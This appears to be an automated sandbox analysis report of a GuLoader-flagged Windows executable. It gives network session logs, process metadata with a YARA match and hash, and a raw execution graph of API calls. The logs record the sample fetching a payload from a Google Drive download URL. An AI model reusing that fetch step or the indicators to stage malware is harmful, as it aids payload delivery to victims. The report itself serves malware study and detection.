                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UEU-v8Qt4d5w1AihIGNMNg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          70 | 192.168.11.20 | 49816 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:38:44 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:44 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-rthil-GIIY6YoW89wEuFOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          71 | 192.168.11.20 | 49817 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:38:44 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          Timestamp:2025-01-10 14:38:44 UTC
                                                                          Bytes transferred:1844
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6u792ajz53euqYAGQY-ZaelbL6ApheVv0IPHtrssMzWXFV8CBBAp_2QCgdUTo85lJ4
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:44 GMT
                                                                          Content-Security-Policy: script-src 'nonce--iuWKS7bn5xuXfLW05SApA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          Timestamp:2025-01-10 14:38:44 UTC
                                                                          Bytes transferred:1652
                                                                          Direction:IN
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0aWo72T3w2OnKKE0WwpkmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Target ID:0
                                                                          Start time:09:30:23
                                                                          Start date:10/01/2025
                                                                          Path:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\nRNzqQOQwk.exe"
                                                                          Imagebase:0x400000
                                                                          File size:616'800 bytes
                                                                          MD5 hash:C616C105A117D63DE2B4F818C8FDD3E0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.13419006132.00000000041CB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:09:31:58
                                                                          Start date:10/01/2025
                                                                          Path:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\nRNzqQOQwk.exe"
                                                                          Imagebase:0x400000
                                                                          File size:616'800 bytes
                                                                          MD5 hash:C616C105A117D63DE2B4F818C8FDD3E0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.16901286727.0000000002BAB000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                            Execution Graph

                                                                            Execution Coverage:16.9%
                                                                            Dynamic/Decrypted Code Coverage:14.4%
                                                                            Signature Coverage:21.5%
                                                                            Total number of Nodes:1468
                                                                            Total number of Limit Nodes:37
403138 SetFilePointer 3878->4078 4054 403138 SetFilePointer 3880->4054 3885 402c96 6 API calls 3881->3885 3884 402ec1 4055 402f33 3884->4055 3885->3869 3886 402e8f 3888 403122 ReadFile 3886->3888 3890 402e9a 3888->3890 3889->3876 3890->3869 3890->3880 4043 402c96 3891->4043 3892 402ecd 3892->3869 3892->3892 3893 402f0a SetFilePointer 3892->3893 3893->3869 3895 406139 5 API calls 3894->3895 3896 403734 3895->3896 3897 40373a 3896->3897 3898 40374c 3896->3898 4108 405cfe wsprintfA 3897->4108 4109 405c87 RegOpenKeyExA 3898->4109 3901 403795 lstrcatA 3904 40374a 3901->3904 3903 405c87 3 API calls 3903->3901 4099 4039e5 3904->4099 3907 405900 18 API calls 3908 4037c7 3907->3908 3909 403850 3908->3909 3911 405c87 3 API calls 3908->3911 3910 405900 18 API calls 3909->3910 3912 403856 3910->3912 3913 4037f3 3911->3913 3914 403866 LoadImageA 3912->3914 3915 405dc2 18 API calls 3912->3915 3913->3909 3920 40380f lstrlenA 3913->3920 3921 40583d CharNextA 3913->3921 3916 40390c 3914->3916 3917 40388d RegisterClassA 3914->3917 3915->3914 3919 40140b 2 API calls 3916->3919 3918 4038c3 SystemParametersInfoA CreateWindowExA 3917->3918 3950 403916 3917->3950 3918->3916 3924 403912 3919->3924 3922 403843 3920->3922 3923 40381d lstrcmpiA 3920->3923 3925 40380d 3921->3925 3927 405812 3 API calls 3922->3927 3923->3922 3926 40382d GetFileAttributesA 3923->3926 3929 4039e5 19 API calls 3924->3929 3924->3950 3925->3920 3928 403839 3926->3928 3930 403849 3927->3930 3928->3922 3931 405859 2 API calls 3928->3931 3932 403923 3929->3932 4114 405da0 lstrcpynA 3930->4114 3931->3922 3934 4039b2 3932->3934 3935 40392f ShowWindow 3932->3935 4115 40508b OleInitialize 3934->4115 3937 4060cb 3 API calls 3935->3937 3939 403947 3937->3939 3938 4039b8 3940 4039d4 3938->3940 3941 4039bc 3938->3941 3942 403955 GetClassInfoA 3939->3942 3946 4060cb 3 API calls 3939->3946 3945 40140b 2 API calls 3940->3945 3948 40140b 2 API calls 3941->3948 3941->3950 3943 403969 GetClassInfoA RegisterClassA 3942->3943 3944 
40397f DialogBoxParamA 3942->3944 3943->3944 3947 40140b 2 API calls 3944->3947 3945->3950 3946->3942 3949 4039a7 3947->3949 3948->3950 3949->3950 3950->3836 3951->3772 4130 405da0 lstrcpynA 3952->4130 3954 405911 4131 4058ab CharNextA CharNextA 3954->4131 3957 40344a 3957->3836 3966 405da0 lstrcpynA 3957->3966 3958 40600b 5 API calls 3964 405927 3958->3964 3959 405952 lstrlenA 3960 40595d 3959->3960 3959->3964 3961 405812 3 API calls 3960->3961 3963 405962 GetFileAttributesA 3961->3963 3963->3957 3964->3957 3964->3959 3965 405859 2 API calls 3964->3965 4137 4060a4 FindFirstFileA 3964->4137 3965->3959 3966->3816 3967->3823 3969 403650 CloseHandle 3968->3969 3970 40365e 3968->3970 3969->3970 4140 40368b 3970->4140 3976 4055ab 3975->3976 3977 40349c ExitProcess 3976->3977 3978 4055bf MessageBoxIndirectA 3976->3978 3978->3977 3980 406139 5 API calls 3979->3980 3981 4034a9 lstrcatA 3980->3981 3981->3810 3981->3811 3983 4054d0 GetLastError 3982->3983 3984 4034eb 3982->3984 3983->3984 3985 4054df SetFileSecurityA 3983->3985 3984->3825 3985->3984 3986 4054f5 GetLastError 3985->3986 3986->3984 3988 405510 GetLastError 3987->3988 3989 40550c 3987->3989 3988->3989 3989->3825 3990->3827 3991->3838 3993 405dcf 3992->3993 3994 405ff2 3993->3994 3997 405e70 GetVersion 3993->3997 3998 405fc9 lstrlenA 3993->3998 4001 405dc2 10 API calls 3993->4001 4002 405ee8 GetSystemDirectoryA 3993->4002 4003 405c87 3 API calls 3993->4003 4004 405efb GetWindowsDirectoryA 3993->4004 4005 40600b 5 API calls 3993->4005 4006 405f2f SHGetSpecialFolderLocation 3993->4006 4007 405dc2 10 API calls 3993->4007 4008 405f72 lstrcatA 3993->4008 4197 405cfe wsprintfA 3993->4197 4198 405da0 lstrcpynA 3993->4198 3995 40354b DeleteFileA 3994->3995 4199 405da0 lstrcpynA 3994->4199 3995->3832 3995->3838 3997->3993 3998->3993 4001->3998 4002->3993 4003->3993 4004->3993 4005->3993 4006->3993 4009 405f47 SHGetPathFromIDListA CoTaskMemFree 4006->4009 4007->3993 4008->3993 4009->3993 4011 405c7c 4010->4011 4012 405c6f 
4010->4012 4011->3838 4200 405ae9 lstrcpyA 4012->4200 4015 405570 4014->4015 4016 405564 CloseHandle 4014->4016 4015->3838 4016->4015 4018 401389 2 API calls 4017->4018 4019 401420 4018->4019 4019->3797 4026 406017 4020->4026 4021 406083 CharPrevA 4022 40607f 4021->4022 4022->4021 4025 40609e 4022->4025 4023 406074 CharNextA 4023->4022 4023->4026 4024 40583d CharNextA 4024->4026 4025->3859 4026->4022 4026->4023 4026->4024 4027 406062 CharNextA 4026->4027 4028 40606f CharNextA 4026->4028 4027->4026 4028->4023 4030 40316d 4029->4030 4031 40582c lstrcatA 4029->4031 4030->3862 4031->4030 4033 405a4d GetTickCount GetTempFileNameA 4032->4033 4034 40317e 4033->4034 4035 405a7a 4033->4035 4034->3774 4035->4033 4035->4034 4036->3868 4037->3871 4039 405866 4038->4039 4040 402d66 4039->4040 4041 40586b CharPrevA 4039->4041 4042 405da0 lstrcpynA 4040->4042 4041->4039 4041->4040 4042->3875 4044 402cb7 4043->4044 4045 402c9f 4043->4045 4048 402cc7 GetTickCount 4044->4048 4049 402cbf 4044->4049 4046 402ca8 DestroyWindow 4045->4046 4047 402caf 4045->4047 4046->4047 4047->3878 4051 402cd5 CreateDialogParamA ShowWindow 4048->4051 4052 402cf8 4048->4052 4079 406175 4049->4079 4051->4052 4052->3878 4054->3884 4056 402f49 4055->4056 4057 402f77 4056->4057 4085 403138 SetFilePointer 4056->4085 4059 403122 ReadFile 4057->4059 4060 402f82 4059->4060 4061 402f94 GetTickCount 4060->4061 4062 4030bb 4060->4062 4064 4030a5 4060->4064 4061->4064 4071 402fc0 4061->4071 4063 4030fd 4062->4063 4068 4030bf 4062->4068 4066 403122 ReadFile 4063->4066 4064->3892 4065 403122 ReadFile 4065->4071 4066->4064 4067 403122 ReadFile 4067->4068 4068->4064 4068->4067 4069 405aba WriteFile 4068->4069 4069->4068 4070 403016 GetTickCount 4070->4071 4071->4064 4071->4065 4071->4070 4072 40303b MulDiv wsprintfA 4071->4072 4083 405aba WriteFile 4071->4083 4086 404fb9 4072->4086 4097 405a8b ReadFile 4075->4097 4078->3886 4080 406192 PeekMessageA 4079->4080 4081 402cc5 4080->4081 4082 406188 DispatchMessageA 
4080->4082 4081->3878 4082->4080 4084 405ad8 4083->4084 4084->4071 4085->4057 4087 404fd4 4086->4087 4096 405077 4086->4096 4088 404ff1 lstrlenA 4087->4088 4089 405dc2 18 API calls 4087->4089 4090 40501a 4088->4090 4091 404fff lstrlenA 4088->4091 4089->4088 4093 405020 SetWindowTextA 4090->4093 4094 40502d 4090->4094 4092 405011 lstrcatA 4091->4092 4091->4096 4092->4090 4093->4094 4095 405033 SendMessageA SendMessageA SendMessageA 4094->4095 4094->4096 4095->4096 4096->4071 4098 403135 4097->4098 4098->3876 4100 4039f9 4099->4100 4122 405cfe wsprintfA 4100->4122 4102 403a6a 4103 405dc2 18 API calls 4102->4103 4104 403a76 SetWindowTextA 4103->4104 4105 403a92 4104->4105 4106 4037a5 4104->4106 4105->4106 4107 405dc2 18 API calls 4105->4107 4106->3907 4107->4105 4108->3904 4110 403777 4109->4110 4111 405cba RegQueryValueExA 4109->4111 4110->3901 4110->3903 4112 405cdb RegCloseKey 4111->4112 4112->4110 4114->3909 4123 403fd1 4115->4123 4117 4050ae 4121 4050d5 4117->4121 4126 401389 4117->4126 4118 403fd1 SendMessageA 4119 4050e7 OleUninitialize 4118->4119 4119->3938 4121->4118 4122->4102 4124 403fe9 4123->4124 4125 403fda SendMessageA 4123->4125 4124->4117 4125->4124 4128 401390 4126->4128 4127 4013fe 4127->4117 4128->4127 4129 4013cb MulDiv SendMessageA 4128->4129 4129->4128 4130->3954 4132 4058d6 4131->4132 4133 4058c6 4131->4133 4135 40583d CharNextA 4132->4135 4136 4058f6 4132->4136 4133->4132 4134 4058d1 CharNextA 4133->4134 4134->4136 4135->4132 4136->3957 4136->3958 4138 4060c5 4137->4138 4139 4060ba FindClose 4137->4139 4138->3964 4139->4138 4142 403699 4140->4142 4141 403663 4144 405642 4141->4144 4142->4141 4143 40369e FreeLibrary GlobalFree 4142->4143 4143->4141 4143->4143 4145 405900 18 API calls 4144->4145 4146 405662 4145->4146 4147 405681 4146->4147 4148 40566a DeleteFileA 4146->4148 4150 4057b9 4147->4150 4184 405da0 lstrcpynA 4147->4184 4149 40347d OleUninitialize 4148->4149 4149->3793 4149->3794 4150->4149 4155 4060a4 2 API calls 4150->4155 4152 
4056a7 4153 4056ba 4152->4153 4154 4056ad lstrcatA 4152->4154 4157 405859 2 API calls 4153->4157 4156 4056c0 4154->4156 4158 4057d3 4155->4158 4159 4056ce lstrcatA 4156->4159 4161 4056d9 lstrlenA FindFirstFileA 4156->4161 4157->4156 4158->4149 4160 4057d7 4158->4160 4159->4161 4162 405812 3 API calls 4160->4162 4163 4057af 4161->4163 4182 4056fd 4161->4182 4164 4057dd 4162->4164 4163->4150 4166 4055fa 5 API calls 4164->4166 4165 40583d CharNextA 4165->4182 4167 4057e9 4166->4167 4168 405803 4167->4168 4169 4057ed 4167->4169 4172 404fb9 25 API calls 4168->4172 4169->4149 4174 404fb9 25 API calls 4169->4174 4170 40578e FindNextFileA 4173 4057a6 FindClose 4170->4173 4170->4182 4172->4149 4173->4163 4175 4057fa 4174->4175 4176 405c5b 38 API calls 4175->4176 4179 405801 4176->4179 4178 405642 62 API calls 4178->4182 4179->4149 4180 404fb9 25 API calls 4180->4170 4181 404fb9 25 API calls 4181->4182 4182->4165 4182->4170 4182->4178 4182->4180 4182->4181 4183 405c5b 38 API calls 4182->4183 4185 405da0 lstrcpynA 4182->4185 4186 4055fa 4182->4186 4183->4182 4184->4152 4185->4182 4194 4059ee GetFileAttributesA 4186->4194 4189 405615 RemoveDirectoryA 4191 405623 4189->4191 4190 40561d DeleteFileA 4190->4191 4192 405627 4191->4192 4193 405633 SetFileAttributesA 4191->4193 4192->4182 4193->4192 4195 405a00 SetFileAttributesA 4194->4195 4196 405606 4194->4196 4195->4196 4196->4189 4196->4190 4196->4192 4197->3993 4198->3993 4199->3995 4201 405b11 4200->4201 4202 405b37 GetShortPathNameA 4200->4202 4227 405a13 GetFileAttributesA CreateFileA 4201->4227 4203 405c56 4202->4203 4204 405b4c 4202->4204 4203->4011 4204->4203 4206 405b54 wsprintfA 4204->4206 4208 405dc2 18 API calls 4206->4208 4207 405b1b CloseHandle GetShortPathNameA 4207->4203 4209 405b2f 4207->4209 4210 405b7c 4208->4210 4209->4202 4209->4203 4228 405a13 GetFileAttributesA CreateFileA 4210->4228 4212 405b89 4212->4203 4213 405b98 GetFileSize GlobalAlloc 4212->4213 4214 405bba 4213->4214 4215 405c4f CloseHandle 
4213->4215 4216 405a8b ReadFile 4214->4216 4215->4203 4217 405bc2 4216->4217 4217->4215 4229 405978 lstrlenA 4217->4229 4220 405bd9 lstrcpyA 4223 405bfb 4220->4223 4221 405bed 4222 405978 4 API calls 4221->4222 4222->4223 4224 405c32 SetFilePointer 4223->4224 4225 405aba WriteFile 4224->4225 4226 405c48 GlobalFree 4225->4226 4226->4215 4227->4207 4228->4212 4230 4059b9 lstrlenA 4229->4230 4231 405992 lstrcmpiA 4230->4231 4233 4059c1 4230->4233 4232 4059b0 CharNextA 4231->4232 4231->4233 4232->4230 4233->4220 4233->4221 5083 401000 5084 401037 BeginPaint GetClientRect 5083->5084 5085 40100c DefWindowProcA 5083->5085 5087 4010f3 5084->5087 5088 401179 5085->5088 5089 401073 CreateBrushIndirect FillRect DeleteObject 5087->5089 5090 4010fc 5087->5090 5089->5087 5091 401102 CreateFontIndirectA 5090->5091 5092 401167 EndPaint 5090->5092 5091->5092 5093 401112 6 API calls 5091->5093 5092->5088 5093->5092 5094 401900 5095 402ace 18 API calls 5094->5095 5096 401907 5095->5096 5097 405596 MessageBoxIndirectA 5096->5097 5098 401910 5097->5098 5099 401502 5100 40150a 5099->5100 5102 40151d 5099->5102 5101 402aac 18 API calls 5100->5101 5101->5102 4234 402483 4245 402bd8 4234->4245 4236 40248d 4249 402ace 4236->4249 4239 4024a0 RegQueryValueExA 4241 4024c0 4239->4241 4242 4024c6 RegCloseKey 4239->4242 4240 402729 4241->4242 4255 405cfe wsprintfA 4241->4255 4242->4240 4246 402ace 18 API calls 4245->4246 4247 402bf1 4246->4247 4248 402bff RegOpenKeyExA 4247->4248 4248->4236 4250 402ada 4249->4250 4251 405dc2 18 API calls 4250->4251 4252 402afb 4251->4252 4253 402496 4252->4253 4254 40600b 5 API calls 4252->4254 4253->4239 4253->4240 4254->4253 4255->4242 5103 100029c3 5104 100029db 5103->5104 5105 10001534 2 API calls 5104->5105 5106 100029f6 5105->5106 5107 401c04 5108 402aac 18 API calls 5107->5108 5109 401c0b 5108->5109 5110 402aac 18 API calls 5109->5110 5111 401c18 5110->5111 5112 401c2d 5111->5112 5113 402ace 18 API calls 5111->5113 5114 401c3d 5112->5114 5115 402ace 18 API 
calls 5112->5115 5113->5112 5116 401c94 5114->5116 5117 401c48 5114->5117 5115->5114 5119 402ace 18 API calls 5116->5119 5118 402aac 18 API calls 5117->5118 5120 401c4d 5118->5120 5121 401c99 5119->5121 5122 402aac 18 API calls 5120->5122 5123 402ace 18 API calls 5121->5123 5124 401c59 5122->5124 5125 401ca2 FindWindowExA 5123->5125 5126 401c84 SendMessageA 5124->5126 5127 401c66 SendMessageTimeoutA 5124->5127 5128 401cc0 5125->5128 5126->5128 5127->5128 4262 401389 4264 401390 4262->4264 4263 4013fe 4264->4263 4265 4013cb MulDiv SendMessageA 4264->4265 4265->4264 5129 40270b 5130 402ace 18 API calls 5129->5130 5131 402712 FindFirstFileA 5130->5131 5132 402735 5131->5132 5136 402725 5131->5136 5133 40273c 5132->5133 5137 405cfe wsprintfA 5132->5137 5138 405da0 lstrcpynA 5133->5138 5137->5133 5138->5136 5139 401490 5140 404fb9 25 API calls 5139->5140 5141 401497 5140->5141 5142 402590 5143 402595 5142->5143 5144 4025a9 5142->5144 5145 402aac 18 API calls 5143->5145 5146 402ace 18 API calls 5144->5146 5148 40259e 5145->5148 5147 4025b0 lstrlenA 5146->5147 5147->5148 5149 405aba WriteFile 5148->5149 5150 4025d2 5148->5150 5149->5150 5151 402c13 5152 402c22 SetTimer 5151->5152 5154 402c3b 5151->5154 5152->5154 5153 402c90 5154->5153 5155 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5154->5155 5155->5153 5156 404714 5157 404740 5156->5157 5158 404724 5156->5158 5160 404773 5157->5160 5161 404746 SHGetPathFromIDListA 5157->5161 5167 40557a GetDlgItemTextA 5158->5167 5163 404756 5161->5163 5166 40475d SendMessageA 5161->5166 5162 404731 SendMessageA 5162->5157 5164 40140b 2 API calls 5163->5164 5164->5166 5166->5160 5167->5162 4305 401d95 GetDC 4306 402aac 18 API calls 4305->4306 4307 401da7 GetDeviceCaps MulDiv ReleaseDC 4306->4307 4308 402aac 18 API calls 4307->4308 4309 401dd8 4308->4309 4310 405dc2 18 API calls 4309->4310 4311 401e15 CreateFontIndirectA 4310->4311 4312 40258a 4311->4312 4313 402695 4314 40269c 4313->4314 4316 40290b 4313->4316 4315 402aac 18 
API calls 4314->4315 4317 4026a3 4315->4317 4318 4026b2 SetFilePointer 4317->4318 4318->4316 4319 4026c2 4318->4319 4321 405cfe wsprintfA 4319->4321 4321->4316 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 10001091 5170->5171 5172 100014bb GlobalFree 5170->5172 5173 100014bb GlobalFree 5171->5173 5172->5171 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5178 100010c6 5175->5178 5176->5175 5179 100014e2 3 API calls 5177->5179 5180 100010d1 GlobalFree 5178->5180 5179->5178 5180->5169 5181 404099 lstrcpynA lstrlenA 5182 401d1a 5183 402aac 18 API calls 5182->5183 5184 401d28 SetWindowLongA 5183->5184 5185 40295e 5184->5185 4432 40159d 4433 402ace 18 API calls 4432->4433 4434 4015a4 SetFileAttributesA 4433->4434 4435 4015b6 4434->4435 5191 40149d 5192 4014ab PostQuitMessage 5191->5192 5193 4022dd 5191->5193 5192->5193 4436 401a1e 4437 402ace 18 API calls 4436->4437 4438 401a27 ExpandEnvironmentStringsA 4437->4438 4439 401a3b 4438->4439 4441 401a4e 4438->4441 4440 401a40 lstrcmpA 4439->4440 4439->4441 4440->4441 4620 40171f 4621 402ace 18 API calls 4620->4621 4622 401726 SearchPathA 4621->4622 4623 401741 4622->4623 5194 100010e0 5203 1000110e 5194->5203 5195 100011c4 GlobalFree 5196 100012ad 2 API calls 5196->5203 5197 100011c3 5197->5195 5198 10001266 2 API calls 5201 100011b1 GlobalFree 5198->5201 5199 10001155 GlobalAlloc 5199->5203 5200 100011ea GlobalFree 5200->5203 5201->5203 5202 100012d1 lstrcpyA 5202->5203 5203->5195 5203->5196 5203->5197 5203->5198 5203->5199 5203->5200 5203->5201 5203->5202 5204 10002162 5205 100021c0 5204->5205 5206 100021f6 5204->5206 5205->5206 5207 100021d2 GlobalAlloc 5205->5207 5207->5205 5208 401e25 5209 402aac 18 API calls 5208->5209 5210 401e2b 5209->5210 5211 402aac 18 API calls 5210->5211 5212 401e37 5211->5212 5213 401e43 ShowWindow 5212->5213 5214 401e4e EnableWindow 5212->5214 5215 40295e 5213->5215 5214->5215 5216 401f2d 5217 
402ace 18 API calls 5216->5217 5218 401f34 5217->5218 5219 4060a4 2 API calls 5218->5219 5220 401f3a 5219->5220 5222 401f4c 5220->5222 5223 405cfe wsprintfA 5220->5223 5223->5222 5224 404f2d 5225 404f51 5224->5225 5226 404f3d 5224->5226 5227 404f59 IsWindowVisible 5225->5227 5235 404f70 5225->5235 5228 404f43 5226->5228 5229 404f9a 5226->5229 5227->5229 5230 404f66 5227->5230 5232 403fd1 SendMessageA 5228->5232 5231 404f9f CallWindowProcA 5229->5231 5237 404884 SendMessageA 5230->5237 5234 404f4d 5231->5234 5232->5234 5235->5231 5242 404904 5235->5242 5238 4048e3 SendMessageA 5237->5238 5239 4048a7 GetMessagePos ScreenToClient SendMessageA 5237->5239 5241 4048db 5238->5241 5240 4048e0 5239->5240 5239->5241 5240->5238 5241->5235 5251 405da0 lstrcpynA 5242->5251 5244 404917 5252 405cfe wsprintfA 5244->5252 5246 404921 5247 40140b 2 API calls 5246->5247 5248 40492a 5247->5248 5253 405da0 lstrcpynA 5248->5253 5250 404931 5250->5229 5251->5244 5252->5246 5253->5250 5254 403ab2 5255 403c05 5254->5255 5256 403aca 5254->5256 5258 403c56 5255->5258 5259 403c16 GetDlgItem GetDlgItem 5255->5259 5256->5255 5257 403ad6 5256->5257 5260 403ae1 SetWindowPos 5257->5260 5261 403af4 5257->5261 5263 403cb0 5258->5263 5272 401389 2 API calls 5258->5272 5262 403f85 19 API calls 5259->5262 5260->5261 5265 403b11 5261->5265 5266 403af9 ShowWindow 5261->5266 5267 403c40 SetClassLongA 5262->5267 5264 403fd1 SendMessageA 5263->5264 5268 403c00 5263->5268 5294 403cc2 5264->5294 5269 403b33 5265->5269 5270 403b19 DestroyWindow 5265->5270 5266->5265 5271 40140b 2 API calls 5267->5271 5274 403b38 SetWindowLongA 5269->5274 5275 403b49 5269->5275 5273 403f0e 5270->5273 5271->5258 5276 403c88 5272->5276 5273->5268 5283 403f3f ShowWindow 5273->5283 5274->5268 5280 403bc0 5275->5280 5281 403b55 GetDlgItem 5275->5281 5276->5263 5277 403c8c SendMessageA 5276->5277 5277->5268 5278 40140b 2 API calls 5278->5294 5279 403f10 DestroyWindow EndDialog 5279->5273 5282 403fec 8 API calls 